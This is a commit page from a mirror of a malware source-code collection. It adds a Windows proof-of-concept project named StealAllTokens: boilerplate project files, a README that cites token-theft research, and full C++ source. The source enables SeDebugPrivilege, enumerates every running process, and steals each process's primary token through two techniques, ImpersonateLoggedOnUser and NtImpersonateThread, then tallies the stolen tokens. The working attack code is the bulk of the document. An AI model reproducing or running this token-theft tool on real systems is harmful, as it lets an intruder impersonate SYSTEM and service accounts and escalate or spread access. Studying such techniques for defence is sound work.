daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-17 00:09:23 +00:00
Code Issues Projects Releases Wiki Activity

updates and moves

Browse Source 
n/a
This commit is contained in:
vxunderground
2022-04-11 20:00:13 -05:00
parent 1275ea2e03
commit 900263ea6f
809 changed files with 149115 additions and 1594 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Win32/Proof of Concepts/StealAllTokens/.gitattributes
+63
View File
@@ -0,0 +1,63 @@
###############################################################################
# Set default behavior to automatically normalize line endings.
###############################################################################
* text=auto
###############################################################################
# Set default behavior for command prompt diff.
#
# This is need for earlier builds of msysgit that does not have it on by
# default for csharp files.
# Note: This is only used by command line
###############################################################################
#*.cs diff=csharp
###############################################################################
# Set the merge driver for project and solution files
#
# Merging from the command prompt will add diff markers to the files if there
# are conflicts (Merging from VS is not affected by the settings below, in VS
# the diff markers are never inserted). Diff markers may cause the following
# file extensions to fail to load in VS. An alternative would be to treat
# these files as binary and thus will always conflict and require user
# intervention with every merge. To do so, just uncomment the entries below
###############################################################################
#*.sln merge=binary
#*.csproj merge=binary
#*.vbproj merge=binary
#*.vcxproj merge=binary
#*.vcproj merge=binary
#*.dbproj merge=binary
#*.fsproj merge=binary
#*.lsproj merge=binary
#*.wixproj merge=binary
#*.modelproj merge=binary
#*.sqlproj merge=binary
#*.wwaproj merge=binary
###############################################################################
# behavior for image files
#
# image files are treated as binary by default.
###############################################################################
#*.jpg binary
#*.png binary
#*.gif binary
###############################################################################
# diff behavior for common document formats
#
# Convert binary document formats to text before diffing them. This feature
# is only available from the command line. Turn it on by uncommenting the
# entries below.
###############################################################################
#*.doc diff=astextplain
#*.DOC diff=astextplain
#*.docx diff=astextplain
#*.DOCX diff=astextplain
#*.dot diff=astextplain
#*.DOT diff=astextplain
#*.pdf diff=astextplain
#*.PDF diff=astextplain
#*.rtf diff=astextplain
#*.RTF diff=astextplain
Win32/Proof of Concepts/StealAllTokens/.gitignore
+340
View File
@@ -0,0 +1,340 @@
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
# User-specific files
*.rsuser
*.suo
*.user
*.userosscache
*.sln.docstates
# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs
# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
[Aa][Rr][Mm]/
[Aa][Rr][Mm]64/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/
# Visual Studio 2015/2017 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/
# Visual Studio 2017 auto generated files
Generated\ Files/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
# NUNIT
*.VisualState.xml
TestResult.xml
# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c
# Benchmark Results
BenchmarkDotNet.Artifacts/
# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/
# StyleCop
StyleCopReport.xml
# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.meta
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Chutzpah Test files
_Chutzpah*
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# Visual Studio Trace Files
*.e2e
# TFS 2012 Local Workspace
$tf/
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user
# JustCode is a .NET coding add-in
.JustCode
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# AxoCover is a Code Coverage Tool
.axoCover/*
!.axoCover/settings.json
# Visual Studio code coverage results
*.coverage
*.coveragexml
# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*
# MightyMoose
*.mm.*
AutoTest.Net/
# Web workbench (sass)
.sass-cache/
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# Note: Comment the next line if you want to checkin your web deploy settings,
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj
# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/
# NuGet Packages
*.nupkg
# The packages folder can be ignored because of Package Restore
**/[Pp]ackages/*
# except build/, which is used as an MSBuild target.
!**/[Pp]ackages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/[Pp]ackages/repositories.config
# NuGet v3's project.json files produces more ignorable files
*.nuget.props
*.nuget.targets
# Microsoft Azure Build Output
csx/
*.build.csdef
# Microsoft Azure Emulator
ecf/
rcf/
# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
*.appx
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!?*.[Cc]ache/
# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs
# Including strong name files can present a security risk
# (https://github.com/github/gitignore/pull/2483#issue-259490424)
#*.snk
# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
ServiceFabricBackup/
*.rptproj.bak
# SQL Server files
*.mdf
*.ldf
*.ndf
# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
*.rptproj.rsuser
*- Backup*.rdl
# Microsoft Fakes
FakesAssemblies/
# GhostDoc plugin setting file
*.GhostDoc.xml
# Node.js Tools for Visual Studio
.ntvs_analysis.dat
node_modules/
# Visual Studio 6 build log
*.plg
# Visual Studio 6 workspace options file
*.opt
# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
*.vbw
# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions
# Paket dependency manager
.paket/paket.exe
paket-files/
# FAKE - F# Make
.fake/
# JetBrains Rider
.idea/
*.sln.iml
# CodeRush personal settings
.cr/personal
# Python Tools for Visual Studio (PTVS)
__pycache__/
*.pyc
# Cake - Uncomment if you are using it
# tools/**
# !tools/packages.config
# Tabs Studio
*.tss
# Telerik's JustMock configuration file
*.jmconfig
# BizTalk build output
*.btp.cs
*.btm.cs
*.odx.cs
*.xsd.cs
# OpenCover UI analysis results
OpenCover/
# Azure Stream Analytics local run output
ASALocalRun/
# MSBuild Binary and Structured Log
*.binlog
# NVidia Nsight GPU debugger configuration file
*.nvuser
# MFractors (Xamarin productivity tool) working folder
.mfractor/
# Local History for Visual Studio
.localhistory/
# BeatPulse healthcheck temp database
healthchecksdb
Win32/Proof of Concepts/StealAllTokens/Img/TI.png
BIN
View File
Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 77 KiB

Win32/Proof of Concepts/StealAllTokens/README.md
+15
View File
@@ -0,0 +1,15 @@
# StealAllTokens
This PoC uses two diferent technics for stealing the primary token from all running processes, showing that is possible to impersonate and use whatever token present at any process
![](Img/TI.png)
# Blogpost
# Credits
* https://posts.specterops.io/understanding-and-defending-against-access-token-theft-finding-alternatives-to-winlogon-exe-80696c8a73b
* https://github.com/lab52io/StopDefender
* https://www.mcafee.com/enterprise/en-us/assets/reports/rp-access-token-theft-manipulation-attacks.pdf
* http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FThread%2FNtImpersonateThread.html
* https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html
Win32/Proof of Concepts/StealAllTokens/StealAllTokens.sln
+41
View File
@@ -0,0 +1,41 @@
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30717.126
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "StealAllTokens", "StealAllTokens\StealAllTokens.vcxproj", "{BB0B2B1E-70D4-4412-8AEC-D1D5DF0594FA}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "StealMachineAccount", "StealMachineAccount\StealMachineAccount.vcxproj", "{20A29CEF-6648-44AC-8B28-B3C362926D3B}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BB0B2B1E-70D4-4412-8AEC-D1D5DF0594FA}.Debug|x64.ActiveCfg = Debug|x64
{BB0B2B1E-70D4-4412-8AEC-D1D5DF0594FA}.Debug|x64.Build.0 = Debug|x64
{BB0B2B1E-70D4-4412-8AEC-D1D5DF0594FA}.Debug|x86.ActiveCfg = Debug|Win32
{BB0B2B1E-70D4-4412-8AEC-D1D5DF0594FA}.Debug|x86.Build.0 = Debug|Win32
{BB0B2B1E-70D4-4412-8AEC-D1D5DF0594FA}.Release|x64.ActiveCfg = Release|x64
{BB0B2B1E-70D4-4412-8AEC-D1D5DF0594FA}.Release|x64.Build.0 = Release|x64
{BB0B2B1E-70D4-4412-8AEC-D1D5DF0594FA}.Release|x86.ActiveCfg = Release|Win32
{BB0B2B1E-70D4-4412-8AEC-D1D5DF0594FA}.Release|x86.Build.0 = Release|Win32
{20A29CEF-6648-44AC-8B28-B3C362926D3B}.Debug|x64.ActiveCfg = Debug|x64
{20A29CEF-6648-44AC-8B28-B3C362926D3B}.Debug|x64.Build.0 = Debug|x64
{20A29CEF-6648-44AC-8B28-B3C362926D3B}.Debug|x86.ActiveCfg = Debug|Win32
{20A29CEF-6648-44AC-8B28-B3C362926D3B}.Debug|x86.Build.0 = Debug|Win32
{20A29CEF-6648-44AC-8B28-B3C362926D3B}.Release|x64.ActiveCfg = Release|x64
{20A29CEF-6648-44AC-8B28-B3C362926D3B}.Release|x64.Build.0 = Release|x64
{20A29CEF-6648-44AC-8B28-B3C362926D3B}.Release|x86.ActiveCfg = Release|Win32
{20A29CEF-6648-44AC-8B28-B3C362926D3B}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {CD0BF4B4-CBDF-4265-8CD0-75DC4A850570}
EndGlobalSection
EndGlobal
Win32/Proof of Concepts/StealAllTokens/StealAllTokens/StealAllTokens.cpp
+454
View File
@@ -0,0 +1,454 @@
/********************************************************************
* StealAllTokens: This PoC uses two diferent technics for stealing
* the primary token from all running processes, showing that is possible
* to impersonate and use whatever token present at any process.
*
* NOTE: We consider that source process has local Admnin privs and
* has High integrity (no SYSTEM account needed)
*********************************************************************/
#include <windows.h>
#include <iostream>
#include <cstdio>
#include <tlhelp32.h>
#include <Lmcons.h>
#include <psapi.h>
#define MAX_NAME 256
BOOL SetPrivilege(
HANDLE hToken, // access token handle
LPCTSTR lpszPrivilege, // name of privilege to enable/disable
BOOL bEnablePrivilege // to enable or disable privilege
)
{
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(
NULL, // lookup privilege on local system
lpszPrivilege, // privilege to lookup
&luid)) // receives LUID of privilege
{
printf("[-] LookupPrivilegeValue error: %u\n", GetLastError());
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
// Enable the privilege or disable all privileges.
if (!AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES)NULL,
(PDWORD)NULL))
{
printf("[-] AdjustTokenPrivileges error: %u\n", GetLastError());
return FALSE;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
{
printf("[-] The token does not have the specified privilege. \n");
return FALSE;
}
return TRUE;
}
std::string get_username()
{
TCHAR username[UNLEN + 1] = {0};
DWORD username_len = UNLEN + 1;
int res = GetUserName(username, &username_len);
std::wstring username_w(username);
std::string username_s(username_w.begin(), username_w.end());
return username_s;
}
HANDLE ListProcessThreads(DWORD dwOwnerPID)
{
HANDLE hThreadSnap = INVALID_HANDLE_VALUE;
THREADENTRY32 te32;
// Take a snapshot of all running threads
hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if (hThreadSnap == INVALID_HANDLE_VALUE)
return(FALSE);
// Fill in the size of the structure before using it.
te32.dwSize = sizeof(THREADENTRY32);
// Retrieve information about the first thread,
// and exit if unsuccessful
if (!Thread32First(hThreadSnap, &te32))
{
printf("[-] Error Thread32First\n"); // Show cause of failure
CloseHandle(hThreadSnap); // Must clean up the snapshot object!
return(NULL);
}
// Trying to open a thread
do
{
if (te32.th32OwnerProcessID == dwOwnerPID)
{
HANDLE thandle = OpenThread(THREAD_DIRECT_IMPERSONATION,
TRUE,
te32.th32ThreadID
);
CloseHandle(hThreadSnap);
if (thandle == NULL) {
printf("[-] OpenThread failed\n");
return (NULL);
}
else {
printf("[+] OpenThread 0x%08X success!\n", te32.th32ThreadID);
return (thandle);
}
}
} while (Thread32Next(hThreadSnap, &te32));
printf("[-] Process not found\n");
return (NULL);
}
BOOL GetTokenServiceName(HANDLE hToken, LPSTR lpName, LPSTR lpDomain) {
DWORD i, dwSize = 0, dwResult = 0;
PTOKEN_GROUPS pGroupInfo;
SID_NAME_USE SidType;
// Call GetTokenInformation to get the buffer size.
if (!GetTokenInformation(hToken, TokenGroups, NULL, dwSize, &dwSize))
{
dwResult = GetLastError();
if (dwResult != ERROR_INSUFFICIENT_BUFFER) {
printf("[-] GetTokenInformation Error %u\n", dwResult);
return FALSE;
}
}
// Allocate the buffer.
pGroupInfo = (PTOKEN_GROUPS)GlobalAlloc(GPTR, dwSize);
// Call GetTokenInformation again to get the group information.
if (!GetTokenInformation(hToken, TokenGroups, pGroupInfo,
dwSize, &dwSize))
{
printf("[-] GetTokenInformation Error %u\n", GetLastError());
return FALSE;
}
// Loop through the group SIDs looking for the administrator SID.
for (i = 0; i < pGroupInfo->GroupCount; i++)
{
// Lookup the account name and print it.
dwSize = MAX_NAME;
if (!LookupAccountSidA(NULL, pGroupInfo->Groups[i].Sid,
lpName, &dwSize, lpDomain,
&dwSize, &SidType))
{
dwResult = GetLastError();
if (dwResult == ERROR_NONE_MAPPED)
strcpy_s(lpName, dwSize, "NONE_MAPPED");
else
{
printf("[-] LookupAccountSid Error %u\n", GetLastError());
return FALSE;
}
}
// This Token has as service group
if (strcmp(lpDomain, "NT SERVICE") == 0)
return true;
}
if (pGroupInfo)
GlobalFree(pGroupInfo);
return FALSE;
}
/********************************************************************
* Technique1: Good technique for PPL processes with relaxed token DACLS
* Uses->
* OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION)
* OpenProcessToken(TOKEN_DUPLICATE | TOKEN_QUERY)
* ImpersonateLoggedOnUser()
*
*********************************************************************/
bool Technique1(int pid) {
// Initialize variables and structures
HANDLE tokenHandle = NULL;
DWORD bsize = 1024;
CHAR buffer[1024] = {0};
HANDLE currentTokenHandle = NULL;
char lpServiceName[MAX_NAME] = { 0 };
char lpServiceDomain[MAX_NAME] = { 0 };
/*
// Add SE debug privilege
BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &currentTokenHandle);
if (SetPrivilege(currentTokenHandle, L"SeDebugPrivilege", TRUE))
{
printf("[+] SeDebugPrivilege enabled!\n");
}
else {
printf("[-] SeDebugPrivilege not enabled!\n");
exit(1);
}
*/
// Call OpenProcess() to open, print return code and error code
SetLastError(NULL);
HANDLE processHandle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, true, pid);
if (GetLastError() == NULL) {
//Get process image name
QueryFullProcessImageNameA((HMODULE)processHandle, 0, buffer, &bsize);
if (GetLastError() != NULL)
{
printf("[-] Technique1 QueryFullProcessImageNameA Pid %i Error: %i\n", pid, GetLastError());
SetLastError(NULL);
}
printf("[+] Technique1 OpenProcess() %s success!\n", buffer);
}
else
{
printf("[-] Technique1 OpenProcess() Pid %i Error: %i\n", pid, GetLastError());
return false;
}
// Call OpenProcessToken(), print return code and error code
bool getToken = OpenProcessToken(processHandle, TOKEN_DUPLICATE | TOKEN_QUERY, &tokenHandle);
if (getToken != 0)
printf("[+] Technique1 OpenProcessToken() %s success!\n", buffer);
else
{
printf("[-] Technique1 OpenProcessToken() %s Return Code: %i\n", buffer, getToken);
printf("[-] Technique1 OpenProcessToken() %s Error: %i\n", buffer, GetLastError());
CloseHandle(processHandle);
return false;
}
// Impersonate user in a thread
bool impersonateUser = ImpersonateLoggedOnUser(tokenHandle);
if (GetLastError() == NULL)
{
printf("[+] Technique1 ImpersonatedLoggedOnUser() success!\n");
printf("[+] Current user is: %s\n", (get_username()).c_str());
//Case SvcHost getting Service name
if (GetTokenServiceName(tokenHandle, lpServiceName, lpServiceDomain)) {
printf("Technique1|%s|%s|%s\n", buffer, (get_username()).c_str(), lpServiceName);
}
else {
printf("Technique1|%s|%s|\n", buffer, (get_username()).c_str());
}
}
else
{
printf("[-] Technique1 ImpersonatedLoggedOnUser() Return Code: %i\n", getToken);
printf("[-] Technique1 ImpersonatedLoggedOnUser() Error: %i\n", GetLastError());
CloseHandle(processHandle);
CloseHandle(tokenHandle);
return false;
}
CloseHandle(processHandle);
CloseHandle(tokenHandle);
return true;
}
/********************************************************************
* Technique2: Good technique for those processes with a very restrictive
* open Token DACLs (Most of the Svchost processes)
* Uses->
* OpenProcess(PROCESS_QUERY_INFORMATION)
* ListProcessThreads()
* NtImpersonateThread()
*
*********************************************************************/
bool Technique2(int pid) {
SECURITY_QUALITY_OF_SERVICE sqos = {};
sqos.Length = sizeof(sqos);
sqos.ImpersonationLevel = SecurityImpersonation;
//sqos.ImpersonationLevel = SecurityIdentification;
DWORD bsize = 1024;
CHAR buffer[1024];
HANDLE currentTokenHandle = NULL;
char lpServiceName[MAX_NAME] = { 0 };
char lpServiceDomain[MAX_NAME] = { 0 };
HANDLE TokenHandle = NULL;;
// Add SE debug privilege
BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &currentTokenHandle);
if (SetPrivilege(currentTokenHandle, L"SeDebugPrivilege", TRUE))
{
printf("[+] SeDebugPrivilege enabled!\n");
}
else {
printf("[-] SeDebugPrivilege not enabled!\n");
exit(1);
}
// Call OpenProcess(), print return code and error code
HANDLE processHandle = OpenProcess(PROCESS_QUERY_INFORMATION, true, pid);
if (GetLastError() == NULL) {
//Get process image name
QueryFullProcessImageNameA((HMODULE)processHandle, 0, buffer, &bsize);
if (GetLastError() != NULL)
{
printf("[-] Technique2 QueryFullProcessImageNameA Pid %i Error: %i\n", pid, GetLastError());
return false;
}
printf("[+] Technique2 OpenProcess() %s success with pid %i !\n", buffer, pid);
}
else
{
printf("[-] Technique2 OpenProcess() Pid %i Error: %i\n", pid, GetLastError());
return false;
}
//Get handle from first process thread
HANDLE hThreadToImpersonate = ListProcessThreads(pid);
if (hThreadToImpersonate == NULL)
{
printf("[-] Technique2 Error getting pthread\n");
return false;
}
//Calling NativeAPI NtImpersonateThread
typedef NTSTATUS __stdcall NtImpersonateThread(HANDLE ThreadHandle,
HANDLE ThreadToImpersonate,
PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService);
NtImpersonateThread* fNtImpersonateThread =
(NtImpersonateThread*)GetProcAddress(GetModuleHandle(L"ntdll"),
"NtImpersonateThread");
// Impersonate user in a thread
BOOL impersonateUser = fNtImpersonateThread(GetCurrentThread(), hThreadToImpersonate, &sqos);
if (GetLastError() == NULL)
{
printf("[+] Technique2 fNtImpersonateThread() %s success!\n", buffer);
printf("[+] Technique2 Current user is: %s\n", (get_username()).c_str());
if (!OpenThreadToken(GetCurrentThread(), TOKEN_QUERY, FALSE, &TokenHandle)) {
printf("[-] OpenThreadToken() Error: %i\n", GetLastError());
printf("Technique2|%s|%s|\n", buffer, (get_username()).c_str());
}
else {
//Case SvcHost getting Service name
printf("[+] OpenThreadToken() Success!\n");
if (GetTokenServiceName(TokenHandle, lpServiceName, lpServiceDomain)) {
printf("Technique2|%s|%s|%s\n", buffer, (get_username()).c_str(), lpServiceName);
}
else {
printf("Technique2|%s|%s|\n", buffer, (get_username()).c_str());
}
CloseHandle(TokenHandle);
}
}
else
{
printf("[-] ImpersonatedLoggedOnUser() Error: %i\n", GetLastError());
}
// Closing not necessary handles
CloseHandle(hThreadToImpersonate);
CloseHandle(processHandle);
return true;
}
int main(int argc, char** argv) {
DWORD aProcesses[1024], cbNeeded, cProcesses;
int HardenedProcessesCount = 0;
int HardenedProcesses[100] = { 0 };
int TotalTechnique1 = 0;
int TotalTechnique2 = 0;
printf("[+] Current user is: %s\n", (get_username()).c_str());
//Get pid list
if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded))
{
printf("[-] Can't enumerate processes");
exit(1);
}
// Calculate how many process identifiers were returned.
cProcesses = cbNeeded / sizeof(DWORD);
// Get process list and try to steal all tokens
for (int i = 0; i < cProcesses; i++)
{
if (aProcesses[i] != 0 && aProcesses[i] !=4)
{
if (Technique1(aProcesses[i])) {
RevertToSelf();
printf("[+] Reverting thread Current user is: %s\n", (get_username()).c_str());
TotalTechnique1++;
}
else {
printf("[-] Technique 1 failed\n\n");
printf("[+] Trying Technique 2\n");
if (Technique2(aProcesses[i])) {
RevertToSelf();
printf("[+] Reverting thread Current user is: %s\n", (get_username()).c_str());
TotalTechnique2++;
}
else {
printf("[-] Can't steal token from process pid %i\n", aProcesses[i]);
HardenedProcesses[HardenedProcessesCount] = aProcesses[i];
HardenedProcessesCount++;
//exit(1);
}
};
printf("\n");
}
Sleep(100);
}
//Listing processes that we couldn't open it
for (int j = 0; j < HardenedProcessesCount; j++) {
printf("[+] PIDs Hardened: %i\n", HardenedProcesses[j]);
}
printf("\n[+] Total processes: %i\n", cProcesses);
printf("[+] Total stolen tokens with Technique1: %i\n", TotalTechnique1);
printf("[+] Total stolen tokens with Technique2: %i\n", TotalTechnique2);
printf("[+] Total PIDs hardened: %i\n", HardenedProcessesCount);
printf("[+] Total PIDs stolen: %i\n", cProcesses - HardenedProcessesCount);
return 0;
}
Win32/Proof of Concepts/StealAllTokens/StealAllTokens/StealAllTokens.vcxproj
+147
View File
@@ -0,0 +1,147 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{bb0b2b1e-70d4-4412-8aec-d1d5df0594fa}</ProjectGuid>
<RootNamespace>StealAllTokens</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
